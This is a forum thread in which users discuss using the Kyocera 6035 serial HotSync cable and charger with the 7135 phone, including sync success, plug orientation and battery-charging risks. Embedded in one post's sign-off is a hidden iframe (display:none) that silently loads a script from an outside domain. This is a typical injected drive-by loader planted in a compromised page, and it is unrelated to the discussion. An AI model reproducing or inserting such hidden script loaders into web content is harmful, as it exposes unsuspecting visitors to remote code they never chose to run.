6035's Serial Hot Sync Cable works with 7135

Everyone, the Serial Hot Sync cable for the 6035 will work with the 7135 for sync'ing only. The power plug is on the wrong side so it want work.

I ordered a "True USB Cable" from Dan's Cell Accessories this weekend because USB is so much faster, but I got tired of trying to hotsync my 7135 with my notebook using IR so I tried the serial cable and it worked fine.

I hope this wasn't already on the board and I missed it somewheres.

    cheers,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Power works for me, although the 6035 supply is lower, and likely won't fully charge the 7135.

DRC, my cable doesn't line up with the power plug in the right direction, what I am using is the Serial Data Cable, TXDTA0078B. See the attached file for a photo.

AFAICS, You can't plug the 7135 charger into either the phone itself or the 6035 cable. You can only use the 6035 charger by plugging it into the port in the serial cable itself.

    Edit:
The above applies when the 6035 serial cable is plugged in. Certainly you can use the 7135 charger in the phone when there's no serial cable.

Try http://www.acronymfinder.com. I use it when I see an acronym I don't understand.

Anyone tried to see if the 7135 charger will fit into the serial connector on the 6035 sync cable? (I don't have both of them at the same location - one at work/one at home).

I too have plugged the 6035 charger into this sync cable, and the 7135 started taking a charge. I agree with DRC that the 6035 charger probably won't charge the 7135 fully, and I would add that in all likelihood it would damage the battery because the volts/amps don't match the 7135's requirements.

Maybe some of you power gu's can add something here.
